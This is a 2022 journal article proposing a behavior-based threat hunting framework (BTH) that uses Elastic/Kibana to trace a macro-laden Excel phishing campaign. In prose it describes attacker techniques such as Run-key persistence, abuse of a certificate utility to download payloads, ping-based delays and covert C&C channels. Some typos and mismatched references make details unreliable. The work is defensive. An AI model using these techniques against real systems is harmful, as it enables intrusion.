Next Article in Journal
A New Compact Method Based on a Convolutional Neural Network for Classification and Validation of Tomato Plant Disease
Next Article in Special Issue
A DDoS Vulnerability Analysis System against Distributed SDN Controllers in a Cloud Computing Environment
Previous Article in Journal
An Adaptive Group of Density Outlier Removal Filter: Snow Particle Removal from LiDAR Data
Previous Article in Special Issue
A Novel Anomaly Detection System on the Internet of Railways Using Extended Neural Networks
 
 
Search for Articles:
Title / Keyword
Author / Affiliation / Email
Journal
Article Type
 
 
Advanced Search
 
Section
Special Issue
Volume
Issue
Number
Page
 
Journals
Electronics
Volume 11
Issue 19
10.3390/electronics11192992
electronics-logo
Submit to this Journal Review for this Journal Propose a Special Issue
Article Menu

Article Menu

share Share announcement Help format_quote Cite question_answer Discuss in SciProfiles thumb_up
...
Endorse textsms
...
Comment
first_page
settings
Order Article Reprints
Font Type:
Arial Georgia Verdana
Font Size:
Aa Aa Aa
Line Spacing:
Column Width:
Background:
Article

BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries

by
Akashdeep Bhardwaj
1,
Keshav Kaushik
1,
Abdullah Alomari
2,
Amjad Alsirhani
3,4,
Mohammed Mujib Alshahrani
5 and
Salil Bharany
6,*
1
School of Computer Science, University of Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
2
Department of Computer Science, Al-Baha University, Albaha 65799, Saudi Arabia
3
College of Computer and Information Sciences, Jouf University, Sakaka 72388, Saudi Arabia
4
Faculty of Computer Science, Dalhousie University, Halifax, NS B3H 4R2, Canada
5
College of Computing and Information Technology, University of Bisha, Bisha 61361, Saudi Arabia
6
Department of Computer Engineering & Technology, Guru Nanak Dev University, Punjab 143005, India
*
Author to whom correspondence should be addressed.
Electronics 2022, 11(19), 2992; https://doi.org/10.3390/electronics11192992
Submission received: 18 August 2022 / Revised: 8 September 2022 / Accepted: 19 September 2022 / Published: 21 September 2022
(This article belongs to the Special Issue Intelligent Data Sensing, Processing, Mining, and Communication)
Browse Figures
Review Reports Versions Notes

Abstract

:
Organizations of every size and industry are facing a new normal. Adversaries have become more sophisticated and persistent than ever before. Every network is facing never-ending onslaughts. Yet many organizations continue to rely on signature-based reactive threat detection and mitigation solutions as the primary line of defense against new-age, cutting-edge attacks. Even conventional attacks can bypass such security solutions. This means legacy protection solutions leave the organization’s data vulnerable to damage, destruction, and theft. Adversarial attacks are like ocean waves: they are very persistent and keep coming like attack campaigns. Sometimes the waves, in our case, attacks, look the same, where indicators of compromise (IoCs) effectively detect the attacks, while sometimes, the waves or attacks change and continue to look different, especially over a while. If somehow the defenders can recognize what is making those attacks or waves and the conditions, then detecting threats and attacks can have a longer-lasting effect of success. This study focuses on the behavior and habits of the attackers that can provide better and long-lasting results when matching adversarial profiles instead of using just IoCs. The paper presents a unique framework for behavior-based structured threat hunting to deliver rapid, consistent remediation against emerging threats and malware on systems and networks.

1. Introduction

Creating adversarial profiles and activities requires good intelligence reports for mitigating and defending security strategies. Indicators of compromise (IoCs) [1] are when data that suggests a cyber-attack may have compromised a computer are referred to as IOCs, which should exist in the report but start to depreciate from the time of the report or the compromise. As per IBM, Threat hunting is a proactive approach to identify non-remediated and unknown threats inside an organization. Crowdstrike defines threat hunting as the process of proactive search for cyber threats hiding undetected inside enterprise networks. Consistent adversarial behavior helps defend against attacks better than using standard operating procedures (SOPs) [2] and defense skillsets. Threat hunting has gained tremendous traction within the cyber security community [3]. Organizations have realized that while traditional security controls and analysis have served as a cornerstone for an organization’s cyber security compliance, they are no longer sufficient to mitigate operational risks. This is especially true given the ever-increasing attack surfaces of these organizations and the increase in the number and capability of cyber adversaries. This reality has necessitated a paradigm shift from reactive to proactive security, and as a result, organizations increasingly focus on threat hunting to fill this realized gap. However, despite this increase in demand for processes, people, and technologies to enable hunts across environments, many organizations continue to struggle with the establishment of sustainable threat hunting capabilities which can operate in a rigorous and repeatable manner. This struggle is often fed by a litany of business and technical challenges, some of which are unique to threat hunting but many of which are common to security practices.
At its simplest, threat hunting is an iterative and proactive process whereby threat hunters seek out anomalous activity, artefacts, and behaviors within an environment to identify previously unknown and undetected threats. Threat hunting or hyber-threat hunt proactively identifies ongoing or previously unknown non-remediated attacks and threats inside the organization’s network. Initially, hunts began with a hypothesis based on triggers which serve as springboards for deep investigations. Threat intel reports further provide specific IoCs for threat hunting models—structured [4] and unstructured [5] threat hunting. Rather of depending solely on automated systems like SIEMs, threat hunting involves manual or machine-assisted techniques. Although alerting is critical, it cannot be the sole priority of a detection tool. Threat hunting increases automated detection by innovative manual and machine learning techniques that aid in identifying malicious and anomalous behaviors. These are translated into valuable information for the detection and investigation of attacks. Different threat hunting models are adopted as:
  • Intel-driven [6] reports and feeds ingested on emerging threat vectors, malware, or vulnerabilities. These are often tailored to validate compromise type of efforts based on targeted knowledge similar in the environment. This helps identify gaps.
  • Situational awareness [7] is useful if the cyber-defence analyst has a deep understanding knowledge of internal risks and critical assets and has spent a long time in the organization. This can be gained if the teams are in the same environment long enough. These are often tailored to scenarios hypothesized around controls and processes that adversaries would exploit and utilize if they entered the environment.
  • Analytics-driven [8] visualizes telemetry in the environment, baselining the environment knowing what is normal and what an anomaly is. These are tailored to abnormal human behavior changes and rabbit home tracing.
  • Hybrid [9] is the most mature level, and this is a blend of all the above.
Structured hunting is a crucial topic to understand when businesses investigate the usage of threat hunting tactics (sometimes referred to as hypothesis-based threat hunting). Most businesses underutilize this sort of hunting. Still, mature organizations may reap some of the most significant benefits from their efforts by including structured threat hunting into their threat hunting efforts. Unstructured threat hunts are usually haphazard and ad hoc activities that rely heavily on data from internal log sources. Hunters sift through logs on the fly, using basic data manipulation techniques such as pivot tables or other ways by analysts, and they frequently rely on investigative tactics such as the principle of least seen to find abnormalities in the data. Structured threat hunting is in contrast to the more common practice of unstructured threat hunting (also known as ad hoc or data-driven hunting). Table 1 below describes the differences between the types of threat hunting.
From a business perspective, one of the most critical challenges organizations are faced with is skills shortages for threat hunting. This means that many organizations are unable to locate resources to stand up a threat hunting capability, and, for organizations that can conduct threat hunting operations, their programs are largely reliant on only a few highly skilled and technical resources. This often means that any fluctuation in manning can have direct operational impacts. Skill shortage, however, is not the only business-related challenge to threat hunting. Another challenge organizations grapple with is the inherently uncertain nature of threat hunting. This uncertainty can often make it a challenge to appropriately measure the value that threat hunting brings to security operations, which in turn can make it difficult to realize the return-on-investment (ROI) for organizations. With ongoing skills shortages for most organizations and the challenge in measuring ROI for organizations, a common outcome of this is that threat hunting teams are often seconded to or forgone altogether in favor of ongoing traditional security operations. From a technical perspective, the number of impediments organizations face to establishing a threat hunting capability are considerable. One of the most common technical challenges is a so-called data deficit. Organizations, dependent upon their current security operations maturity, often find that the depth, breadth, quality, and quantity of their data is insufficient to support threat hunting operations. This challenge can be compounded as security teams come to their existing security controls may not provide sufficient coverage to support more advanced threat hunting. The ongoing skill shortage also manifests itself as a technical issue for organizations, especially true as the number of resources with the depth of experience to develop operational capabilities and conduct threat hunting operations continues to remain very low. The result is often a lack of direction and focuses for threat hunting operations which typically results in a lack of defined processes, as well as ineffective and unreliable hunts. Despite these significant challenges that organizations continue to encounter, there are both demands and a need for mature, reliable, repeatable, and robust hunting capabilities in many organizations.
The highlights of this threat hunting research are as follows:
  • Design and implement an online threat hunting platform;
  • Perform threat hunting based on behavioral patterns instead of using IOCs;
  • Propose a new threat hunting process using the threat intelligence report;
  • Capture threat information and artefacts from logs.
This research is organized into different sections. Section 2 reviews the previous research works and implementations from various journals. Section 3 presents the research methodology with the threat intel report to research as per the proposed behavior-based threat hunting framework. Section 4 presents the implementation and platforms used in the form of Elastic instance and network traffic logs, and alsopresents the bad behavior-based filtering and searches for malicious artifacts as per the intel report. Section 5 presents the results obtained as the artifacts and information regarding the attack, and finally, the conclusion with the future scope in Section 6.

2. Literature Survey

Recent years have seen an increase in cyberattacks that affect small, medium, and large enterprises, prompting the creation of solutions to help with risk mitigation. Organizations today receive a lot of threat data from many sources due to the rise in cyberattacks, which has to be ingested, processed, and assessed in order to give useful mitigation insights. Based on research keywords for behavior-based threat hunting, such as IoCs, threat hunting, threat intelligence, structured threat hunting, unstructured threat hunting. the authors categorized and classified the papers as the first level of review. The authors then organized to search 243 research papers and after four-stage process 22 relevant papers are shortlisted from literature as presented in Table 2.
Ajmal et al. [10] proposed a unique hybrid approach for identifying offensive security strategies, techniques, and processes, especially threat hunting using adversary emulation. The suggested method is based on a unique method for introducing adversary emulation (mapping each step) into the threat hunting process. The experimental results reveal that the suggested technique leverages adversary simulation to hunt advanced-level threats and has opposing impacts. Furthermore, the suggested approach’s threat detection capability requires few resources. The suggested method may be utilized to create an offensive security-aware environment for businesses for discovering sophisticated threat and attack methods and evaluate their capacity for detecting attacks.
The ability of system security for detecting the growing threats is mismatched. Anti-malware, anti-virus and endpoint detection are reactive security systems that are ineffective against attacks that are extremely slow and stealthy. The need of the hour is for a proactive strategy, such as threat hunting. Cyber Deception and Cyber-Kill Chain with threat hunting have contradictory impacts on identifying and mitigating threats, according to Ajmal et al. [11]. The authors adopted the approach of decoy farms, in which attacks are engaged. Unknown risks were the subject of a revolutionary threat detection and prevention strategy. The research introduced a new simulated network to examine the effectiveness of the strategy by simulating multiple industrial systems running Linux and Windows-based assaults. The authors found that the suggested technique discovered and blocked attackers before utilizing the present reactive approach and security mechanism for heterogeneous devices, resulting in increased protection. The suggested threat hunting technique has greatly increased the threat detection capabilities, according to the results and testing.
Defenders battling APTs must identify an adversary’s propagation region as rapidly as feasible, employing incident response operations and threat hunting to locate attackers within a compromised network. From both the attacker and defender viewpoints, Berady et al. [12] established a formal attack model. An infinitely powerful actor can compare the differences in knowledge and perception between defenders and attackers using this model, enabling defenders for improving Threat hunting quality by identification of false-positives and adapt log policy to be investigation-oriented. The authors described an assault campaign that imitated the actual threat known as APT29 in an MITRE-designed model. The quality of the defensive architecture is next thoroughly examined.
Jadidi et al. [13] highlighted missing solutions for unified hunting for integrated IT and OT networks, proposing a threat hunting framework that focused on the detection of cyber threats against industrial devices in the initial stages of the incident lifecycle. Threat hunting, triggers, and cyber threat intelligence as the three steps of the proposed framework. The threat hunting trigger stage detects occurrences or external resources that may cause the hunting stage to be triggered. To establish a hunting hypothesis and predict the adversary’s future behavior, the hunting stage employs a mix of the MITRE ATT&CK Matrix and a diamond model of intrusion analysis. The validity of this hypothesis was verified by analyzing diamond threat action models. Finally, the cyber threat intelligence stage is in charge of producing IoCs for future threat hunting. The SWaT dataset, Black Energy 3 malware, and PLC-Blaster malware were employed in this research to examine the effectiveness of the proposed framework.
Jahromi et al. [14] provided a deep recurrent neural network approach as a stacked long short-term memory, using global and short input dependencies as a normalization method to avoid random network initialization. The authors were able to eliminate random initialization and increase the accuracy and resilience of malware threat hunting by using pre-training. In comparison to the stacked approach, the proposed method reduced the length of malware OpCode or bytecode sequences, and accelerated convergence. As a result, the concluding method’s complexity was lowered. In comparison to a typical model with identical detection time, this resulted in increased accuracy. Smart IoT devices integrated into human life have become routes for hackers’ malicious activities as the Internet of Things (IoT) age has expanded. IoT devices use a variety of Unix-based architectures that conform to the standard binary file specification of the executable and linked format. Raju et al. [15] focused on presenting an overview of the recent advances in merged IoT malware detection and classification methods. The authors addressed the feature representations, feature extraction strategies, and machine learning models using modern taxonomy. This study emphasised on the practical issues of tracking down cross-architectural IoT malware threats and discussed several possibilities for future research. Industrial IoT devices are now becoming increasingly targeted, owing to their wide use in a variety of applications, including home and corporate environments. Using the grey wolves’ optimization approach, Haddadpajouh et al. [16] suggested a multi-kernel support vector machine for IoT cloud-edge gateway virus hunting. At the IoT cloud-edge gateway, this meta-heuristic technique is utilized to determine the best attributes for identifying malicious and benign applications. The model is trained using the IoT malware Opcode and Bytecode training data set, which included both benign and malicious samples, and assessed using the k-fold cross-validation approach. In terms of accuracy, the proposed multi-kernel SVM strategy beats DNNs and fuzzy-based IoT malware hunting strategies while also reducing the computing cost and training time.
Crypto ransomware has radically altered the threat-landscape. By encrypting critical data on victims’ systems, crypto-ransomware disables data custodian access and demands a ransom payment to restore custodian access by decrypting data. The speed and accuracy with which system logs can be mined to hunt for anomalies and eliminate ransomware depend a lot on how fast and accurately it can be detected. Homayoun et al. [17] set up an environment to capture activity logs for the ransomware strains Locky, Cerber, and TeslaCrypt. The authors utilized sequential pattern mining to uncover MFPs of behaviors. The suggested approach was 96.5 percent accurate in determining the family of a given ransomware sample and 99 percent accurate in detecting ransomware cases from goodware samples. The results showed that applying pattern mining approaches to the detection of favorable traits for ransomware hunting is both beneficial and practicable. This research revealed various ransomware families with distinct features and common patterns that could be evaluated to identify ransomware sample families and create knowledge about threat actors and the threat profile of a specific target.
Unmanned underwater vehicles (UUVs) have become vital in today’s maritime environment. Underwater reconnaissance and surveillance, underwater mine hunting, and anti-submarine warfare are only a few of the activities that represent a major and hazardous threat to humans. UUV has emerged as the leading technology for completing such missions. Yao et al. [18] suggested a technique for evaluating the UUV in an underwater hazard situation based on dynamic Bayesian network modeling. The researchers classified the hazards posed by UUVs into three categories: environmental, platform, and mission factors. The authors performed factor extraction and set up the prior probability based on the features for each of these categories. The incorporation of state transition probability and the creation of a model for assessing the dynamic Bayesian threat scenario were required to set up the static Bayesian network. The dynamic Bayesian simulation was shown to be superior when the results of the static and dynamic Bayesian simulations were compared. Furthermore, by studying the sensitivity, we were able to identify the most serious present danger and, as a result, develop the best UUV countermeasures. The findings revealed that the dynamic Bayesian technique has a lot of practical usefulness in threat assessment. The integration of industry 4.0 and intelligent IoT technologies has enhanced the vulnerability of industrial cyber-physical systems (ICPS) to a diverse variety of network attacks. Assessing cyber threats with intelligent threat detection is a difficult undertaking since it involves interacting with large-scale, sophisticated, and diverse ICPS. Abdel-Basset et al. [19] presented a novel model based on federated deep learning to perform threat hunting against ICPS that captured network data in both temporal and geographical representations. The authors proposed an innovative framework to deploy as Micro-services on relevant edge servers while ensuring adequate resource orchestration using container-based industrial edge computing. An experimental micro-services placement methodology was developed to allow improved micro-services deployment depending on the computational capacity of the participants to resolve the latency issue of an ICSP. The efficiency of the proposed techniques in terms of high accuracy and f1-scores was evaluated by simulated results obtained from two public benchmarks.
By correlating multi-source data, Ju et al. [20] proposed a multi-layer data fusion approach to detect cyber-attacks. The researchers proposed multi-correlation analysis, which included correlation of events, pattern-knowledge, alert, and alert-context for identifying anomalous traffic, alert-based known attack, pattern-based attack, and alert-pattern attack, respectively. Despite the simple suggested framework, they were unable to demonstrate real-world outcomes from it, and they still believe that manual analysis is the best way to track down threat analysts.
Almohannadi et al. [21] proposed cyber threat analysis based on three threat intelligence components: attack, pattern, and behavior, utilizing a viable open-source elastic search engine. This research however, focused only on honeypot traffic based on the incident, and not the threat’s history and behavior.
Gao et al. [22] recommended using open-source cyber threat intelligence to do realistic threat hunting based on system auditing frameworks (OSCTI). The proposed architecture utilized the OSCTI report to extract threat behavior by converting it to a threat behavior graph, which is then ingested into query-based threat hunting to generate a system auditing report as threats are being found. The suggested system’s performance and threat detection accuracy are strongly reliant on the richness of OSCTI text and/or derived threat information, from which a threat behavior pattern was generated.
By mapping the Microsoft Advanced Threat Analytics data to the diamond model and Kill Chain model, Ertaul et al. [23] were able to detect intrusions. The mapping that resulted emphasized the complexity of an incursion, its phases, and the linkages between the attacker, victim, capacity, and infrastructure. During threat hunting in system memory, Javeed et al. [24] stressed the significance of additional memory forensics processes to confirm the presence of malware in the host under study. During the research of network log collection, the investigation overlooked significant artifacts that may have led to the discovery of undiscovered threat patterns.
Dietrich et al. [25] investigated logs from a range of perimeter security devices, including firewall and intrusion detection systems, which were gathered and ingested into the elastic stack for analysis. Outgoing packets are filtered, displayed, and pro-active threat hunting is used to identify unknown threats and validate them using memory forensics.

3. Research Methodology

This research focuses on a threat intelligence report [26] received against the use case involving an IT services organization, employing 7000 engineers and staff in over 50 customer locations on-site. The customers include enterprise organizations that are technology, energy, manufacturing, and government agencies as well as service engineers delivering support to remote offices and locations. The threat intelligence report mentions an advanced persistent threat (APT) [27] activity discovered 3 months prior, targeting such service organizations. The activities are seen over networks using common protocols and service applications. From the initial reading, the threat targets most probably the organization we are concerned about, the attack had been in action for the prior 3 months, so a lot of time has already passed and IoCs could have changed over time. The threat intelligence report summary presents indicators of compromise as sender addresses, malicious attachments, hashes, and file names, as illustrated in Figure 1.
The initial compromise could most likely be using phishing with geopolitical references to US and Antarctica on global warming. The report provides evidence of IOCs on activities using VB script execution, these malicious attachments are being sent as macro-enabled Microsoft Office Excel documents through emails. On opening these email attachments, some Visual Basic scripts execute the payload. This constitutes the behavior. The report further cites the abuse and execution of COM-based objects as presented in Figure 2. The attack allows standard system mechanics to execute malicious processes under different mandates or contexts that enable privilege escalations.
The payloads are also observed to be executing as native Windows Defense software, such techniques are used to blend in and use living-off-the-land (LOTL) binaries, which are legitimate executables in the operating system. The payloads mask themselves as components of the Windows Defender framework. Maintaining persistence by the malicious payload is done by utilizing the ‘RUN’ keys in the local registry hive, which allows execution of the malware even after the system is rebooted. ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater’ is the hive location to maintain elevated privileges for the malicious payload. From the threat intelligence report, the LOTL binaries enumerate the host and environment-saving the output in text files and utilize covert channels to communicate the information to the attacker’s command and control (C&C) server [28] using HTTP and ICMP protocols. On using standard security processes for identifying and analyzing the breach, no IoCs seem to match. This motivated the researchers to design and implement a behavior-based Threat hunting framework named BTH. The setup is configured to report threat hunting based on adversarial activity profiles to defend and build security strategies. IOCs in the threat intelligence reports start to depreciate from the time of report or the compromise. Consistent threat intelligence differs from report to report, so adversarial behavior related to their standard operating procedures, skill set, and habits is focused on in this research.

4. BTH: Behavior-Based Threat Hunting

The research setup involves hardware with a 4-Core CPU, 8 GB memory, and 50 GB disk running the 64-bit Ubuntu operating system. The software tools involved Elastic instance [29] and Kibana services managed by Docker accessed over web browsers. After the hardware and software components were implemented to run the Elastic instance, threat logs are ingested using Python code. The logs are initially verified in the Kibana instance for different data and time ranges. The hunting platform uses the MITRE attack framework to analyze the hunts in this research [30,31,32,33,34,35,36]. The focus of this threat hunting research is to find IoCs based on behavior using the elastic instance searching from top-down searching for malicious documents being sent to senders as attachments in form of macro-enabled Microsoft Excel documents (.xlsm) embedded with VB script which pull and download payloads and executes them, which indicates a phishing attack [37,38,39,40,41,42,43,44].
Elastic Instance is ingested with 242,380 threat logs to analyze as illustrated in Figure 3.
An initial search on the threat hunting platform for Microsoft office and one of the packages displays information about various attack methods for Windows scripting and executing malicious payload programs is shown in Figure 4.
The platform provides details of real-world attack executions related to ‘Microsoft Office’ and Excel documents to Elastic and so the focus is on the Endpoint Sysmon category as presented in Figure 5 which provides the actual script to query the Elastic Instance having the attack logs.
On executing the script on the threat hunt platform, some hits are reported immediately, highlighting some of the threat activities as illustrated in Figure 6. The next step is to verify if these activities are associated with the threat report.
To validate the findings, on filtering two variables ‘process.parent.executable’ and ‘process.executable’ and Figure 7 illustrates Microsoft Excel launching multiple Windows command line terminals.
On further filtering and adding ‘process.command_line’ and ‘process.parent.command_line’ variables, Figure 8 illustrates that Microsoft Excel calls the command line, creating hidden directories in %AppData% \Defender and uses a temporary macro-enabled Excel document from the user folder—this is a similar theme that has been reported in the threat intelligence report.
On reviewing more logs, this utiliutilisesutil.exe which is a Microsoft binary and part of certificate services to dump and display keys and certificates. However, this utility is being used to download a ZIP file from Github URL and copying to the hidden folder that was initially created. On unzipping this, contains several payload executables as presented in Figure 9.
A threat Intelligence report in Figure 10 also mentions scripts being executed from the attachments and different methods for delayed execution—which seems to be a bad behavior.
On searching the hunting platform for ‘delayed execution’ which provides a result as illustrated in Figure 11. This presents the command line, Ping, and Loopback as the possible vectors.
On running the script query for these vectors, two results are obtained as presented in Figure 12.
On further filtering of the reported findings for ‘process.executable’, ‘process.command_line’, ‘process.parent.executable’, and ‘process.partent_pid’—two results are obtained, as illustrated in Figure 13. These validate the threat reports of Ping being utilized and the loopback report, which mentioned 127.0.0.200, instead of 127.0.0.27, pinging 50 times—this is a case of using loopback with a slightly different variation to have the same impact, which indicates the attacker’s behavior.
This validates the case being a behavior-based hunt with the cmd.exe executing via process ID 10 and 156. On disabling the initial query and searching for those PIDs, Figure 14 illustrates process.executable kicked an executable in the folder that further executed ‘msmpeg.exe’.
On looking at the whole context of the filtering and execution and searching for only the process IDs 10, and 156, the logs present the Excel document in Figure 15.
The proposed framework, aptly named BTH—Behavior-based Threat Hunting, referred to the threat intel report, ingested the network traffic logs into the Elastic Instance and then searched and filtered for various IoCs in the hunt platform and then validated artifact and details obtained and discussed in the next section.

5. Results Obtained

Organizations often rely on threat hunters for their ability to detect previously unknown and unidentified threats; threat hunting also serves as an invaluable input and resource for organizations’ existing security operations. To that end, threat hunting should serve as a rising tide that lifts all boats within an organization and not remain a lake of knowledge. The proposed implemented framework automatically tailors and deploys a threat hunting package as per the organization’s unique environment on the SIEM and EDR platforms. Each package includes guided hunt plans and run books for the security teams, this provides actionable threat intelligence, analyst-focused remediation, and cyber threat emulation. This helps in detecting advanced adversaries while maximizing the value of the existing security solutions by transforming traditional CIT into advanced actionable CTI; see the proposed framework playbook in Figure 16.
The authors propose first performing alert-based investigations with behavior-based threat hunting aligned with the MITRE matrix. Behaviors include misbehaving Windows OS power-shell, HTTP User-agent string that may download additional toolsets or malware scripts, unknown process IDs and command line process executions, DNS tunneling or logs related to lateral movement resulting in privilege escalation. On reviewing emails received by the organizations, viruses, DLP policy violations, and advanced threats are revealed, which point to the reason for the Email Excel attachment attack, as illustrated in Figure 17.
Figure 18 further confirms the detection of the specific machine and user whose account faced the privilege escalation attack.
From the above hunts, Figure 19 illustrates the threat information uncovered and artifacts, which includes leading indicators, types, and the actual artifacts investigated as part of the initial report to escalate and build indicators to investigate further.
As illustrated in this research, behavior-based threat hunting with synthesized criteria to rank order three threat hunt detection profiles and confirm the findings to recognize and consider successful threat hunting capability and measure how far or close organizations are to an ideal or fully mature threat hunting program. The accuracy of behavior-based threat hunting depends on the quantity and quality of data collected, methods and capabilities to visualize and analyze data of varying sources and types, as well as the types of analytics which can be applied to the data to enhance hunters’ insights into said data. An organization utilizing the behavior-based threat hunt would largely address hidden threats in logs. As a result, such organizations are able not only to develop their hunting content and queries but are also able to keep pace with the ancillary tasks associated with threat hunting, especially in the development of threat detection content.
The authors validated the results using machine learning algorithms for the alternate hypothesis with synthesized criteria and enabling rank ordering of three threat hunt detection profiles. The hunting success is based on five criteria for hunt accuracy detection as presented in Table 3 with criteria as C1 to C5 with accepted values in the range and weight columns representing the percentage values per the scenarios and requirements of the methods. Table 4 presents the pattern sigma detected and unknown threat patterns, using binary outputs using three different traffic logs.
Table 5 illustrates the different enterprise threat hunting levels, which initially created the hypothesis to drive the organization’s efforts for threat hunting, the use of threat intel to hypothesize threats discovered and executed in the network and systems and behavior-based hunting.

6. Conclusions

As the threat landscape continues to evolve and adversaries carry on developing their overall tradecraft, organizations are aware of the growing limitations posed by traditional security practices. As a result, more organizations are looking to threat hunting as a means of further maturing their overall security operations. As a result, the requirement to understand what threat hunting is and what is not and the role hunting plays in the overall security processes is more important than ever. This research proposed a unique threat hunting framework to improve cyber threat detection using a behavior-based methodology. This research focuses on the behavior and habits of attackers that can provide better and long-lasting results when matching adversarial profiles instead of using just IoCs. This research presents a unique framework for a behavior-based structured threat hunting to deliver rapid, consistent remediation against emerging threats and malware on the systems and networks and validates the results using machine learning.

Author Contributions

Conceptualization, A.B., K.K. and S.B.; methodology, A.B., K.K., S.B., A.A. (Abdullah Alomari) and A.A. (Amjad Alsirhani); software, A.B., K.K. and S.B.; validation, A.B., K.K. and S.B.; formal analysis, A.A. (Abdullah Alomari), S.B. and M.M.A.; investigation A.B., K.K. and S.B.; resources, A.A. (Abdullah Alomari); data curation, S.B.; writing—original draft preparation, A.B., K.K., S.B. and A.A. (Amjad Alsirhani); writing—review and editing, A.B., K.K., A.A. (Abdullah Alomari) and S.B.; visualization, S.B. and M.M.A.; supervision, A.B. and S.B.; project administration, S.B. and A.A. (Abdullah Alomari); funding acquisition, A.A. (Abdullah Alomari) and M.M.A. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Conflicts of Interest

The authors declare that they have no conflicts of interest to report regarding the present study.

References

  1. Ioc-Threat-Hunting. Available online: https://www.manageengine.com/products/eventlog/cyber-security/ioc-threat-hunting.html (accessed on 7 January 2022).
  2. 8 Steps to Start Threat Hunting. Available online: https://www.cybereason.com/blog/blog-the-eight-steps-to-threat-hunting. (accessed on 14 January 2022).
  3. Proactive Guide CrowdStrike. What is Cyber Threat Hunting? Available online: https://www.crowdstrike.com/cybersecurity-101/threat-hunting/ (accessed on 21 January 2022).
  4. Structured Threat Hunting: One Way Microsoft Threat Experts. Available online: https://www.microsoft.com/security/blog/2021/12/02/structured-threat-hunting-one-way-microsoft-threat-experts-prioritizes-customer-defense/ (accessed on 20 January 2022).
  5. IBM. What is threat hunting? Available online: https://www.ibm.com/topics/threat-hunting (accessed on 2 January 2022).
  6. VerSprite. Intel Driven Threat Hunting Inside Your Network. Available online: https://versprite.com/slides-presentations/intel-driven-threat-hunting-class/ (accessed on 12 December 2021).
  7. Situational-Awareness Driven Threat Hunting. Available online: https://www.cybersecurity-insiders.com/situational-awareness-driven-threat-hunting/ (accessed on 20 January 2022).
  8. Threat Hunting Tools-eduCBA. Available online: https://www.educba.com/threat-hunting-tools/ (accessed on 2 January 2022).
  9. Five Types of Threat Hunting Cybersecurity Insiders. Available online: https://www.cybersecurity-insiders.com/5-types-of-threat-hunting/ (accessed on 12 January 2022).
  10. Ajmal, B.; Shah, M.A.; Maple, C.; Asghar, M.N.; Islam, S.U. Offensive Security: Towards Proactive Threat Hunting via Adversary Emulation. IEEE Access 2021, 9, 126023–126033. [Google Scholar] [CrossRef]
  11. Ajmal, B.; Alam, M.; Khaliq, A.A.; Khan, S.; Qadir, Z.; Mahmud, M.A.P. Last Line of Defense: Reliability Through Inducing Cyber Threat Hunting With Deception in SCADA Networks. IEEE Access 2021, 9, 126789–126800. [Google Scholar] [CrossRef]
  12. Berady, A.; Jaume, M.; Tong, V.V.T.; Guette, G. From TTP to IoC: Advanced Persistent Graphs for Threat Hunting. IEEE Trans. Netw. Serv. Manag. 2021, 18, 1321–1333. [Google Scholar] [CrossRef]
  13. Jadidi, Z.; Lu, Y. A Threat Hunting Framework for Industrial Control Systems. IEEE Access 2021, 9, 164118–164130. [Google Scholar] [CrossRef]
  14. Jahromi, A.N.; Hashemi, S.; Dehghantanha, A.; Parizi, R.M.; Choo, K.-K.R. An Enhanced Stacked LSTM Method with No Random Initialization for Malware Threat Hunting in Safety and Time-Critical Systems. IEEE Trans. Emerg. Top. Comput. Intell. 2020, 4, 630–640. [Google Scholar] [CrossRef]
  15. Raju, A.D.; Abualhaol, I.Y.; Giagone, R.S.; Zhou, Y.; Huang, S. A Survey on Cross-Architectural IoT Malware Threat Hunting. IEEE Access 2021, 9, 91686–91709. [Google Scholar] [CrossRef]
  16. Haddadpajouh, H.; Mohtadi, A.; Dehghantanaha, A.; Karimipour, H.; Lin, X.; Choo, K.-K.R. A Multikernel and Metaheuristic Feature Selection Approach for IoT Malware Threat Hunting in the Edge Layer. IEEE Internet Things J. 2021, 8, 4540–4547. [Google Scholar] [CrossRef]
  17. Homayoun, S.; Dehghantanha, A.; Ahmadzadeh, M.; Hashemi, S.; Khayami, R. Know Abnormal, Find Evil: Frequent Pattern Mining for Ransomware Threat Hunting and Intelligence. IEEE Trans. Emerg. Top. Comput. 2020, 8, 341–351. [Google Scholar] [CrossRef]
  18. Yao, H.; Wang, H.; Li, Y.; Wang, Y.; Han, C. Research on Unmanned Underwater Vehicle Threat Assessment. IEEE Access 2019, 7, 11387–11396. [Google Scholar] [CrossRef]
  19. Borges Amaro, L.J.; Percilio Azevedo, B.W.; Lopes de Mendonca, F.L.; Giozza, W.F.; Albuquerque, R.d.O.; García Villalba, L.J. Methodological Framework to Collect, Process, Analyze and Visualize Cyber Threat Intelligence Data. Appl. Sci. 2022, 12, 1205. [Google Scholar] [CrossRef]
  20. Ju, A.; Guo, Y.; Ye, Z.; Li, T.; Ma, J. HeteMSD: A Big Data Analytics Framework for Targeted Cyber-Attacks Detection Using Heterogeneous Multisource Data. Secur. Commun. Netw. 2019, 2019, 5483918. [Google Scholar] [CrossRef]
  21. Almohannadi, H.; Awan, I.; al Hamar, J.; Cullen, A.; Disso, J.P.; Armitage, L. Cyber threat intelligence from honeypot data using elasticsearch. In Proceedings of the 2018 IEEE 32nd International Conference on Advanced Information Networking and Applications (AINA), Krakow, Poland, 16–18 May 2018; pp. 900–906. [Google Scholar]
  22. Gao, P.; Shao, F.; Liu, X.; Xiao, X.; Qin, Z.; Xu, F.; Mittal, P.; Kulkarni, S.R.; Song, D. Enabling Efficient Cyber Threat Hunting With Cyber Threat Intelligence. In Proceedings of the 2021 IEEE 37th International Conference on Data Engineering (ICDE), Chania, Greece, 19–22 April 2021. [Google Scholar]
  23. Ertaul, L.; Mousa, M. Applying the Kill Chain and Diamond Models to Microsoft Advanced Threat Analytics. In Proceedings of the 2018 International Conference on Security and Management (SAM’18), Las Vegas, NV, USA, 30 July–2 August 2018; pp. 252–258. [Google Scholar]
  24. Javeed, D.; Khan, M.T.; Ahmad, I.; Iqbal, T.; Badamasi, U.M.; Ndubuisi, C.O.; Umar, A. An Efficient Approach of Threat Hunting Using Memory Forensics. Int. J. Comput. Netw. Commun. Secur. 2020, 8, 37–45. [Google Scholar] [CrossRef]
  25. EMC Education Services. Data Science and Big Data Analytics: Discovering, Analyzing, Visualizing and Presenting Data; John Wiley & Sons: Hoboken, NJ, USA, 2015. [Google Scholar]
